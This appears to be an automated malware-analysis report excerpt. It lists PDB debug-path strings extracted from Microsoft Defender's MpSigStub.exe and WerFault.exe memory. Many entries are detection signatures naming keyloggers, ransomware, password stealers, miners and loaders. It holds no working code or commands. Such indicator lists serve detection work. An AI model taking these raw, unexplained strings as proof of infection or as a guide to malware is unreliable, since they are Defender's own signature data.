Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: \isn.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb( source: WerFault.exe, 00000005.00000003.2857096900.0000000005434000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp
Source:	Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: megasync.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: vga256.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: kernel32.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: winscard.pdb source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source:	Binary string: stscast.pdb source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source:	Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source:	Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb( source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918468716.00000000030C6000.00000004.00000001.sdmp
Source:	Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000009.00000003.2920056243.00000000030D7000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb* source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source:	Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source:	Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source:	Binary string: security.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source:	Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb3 source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: nafde.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source:	Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: autofmt.pdb source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp
Source:	Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: sxs.pdbj source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: sfc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source:	Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source:	Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb( source: WerFault.exe, 00000005.00000003.2855994969.00000000029B0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2919220866.00000000030BB000.00000004.00000001.sdmp
Source:	Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source:	Binary string: PassView.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp
Source:	Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: msoert2.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp
Source:	Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: dsquery.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.2856883159.00000000029A5000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962000837.00000000051D0000.00000004.00000040.sdmp
Source:	Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source:	Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: subst.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source:	Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb( source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2927187876.000000000617A000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source:	Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: pid.pdb3 source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.2859676804.00000000054EC000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2922725864.0000000006136000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: \ransom.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp
Source:	Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.2858017646.000000000543F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918507179.00000000030CC000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
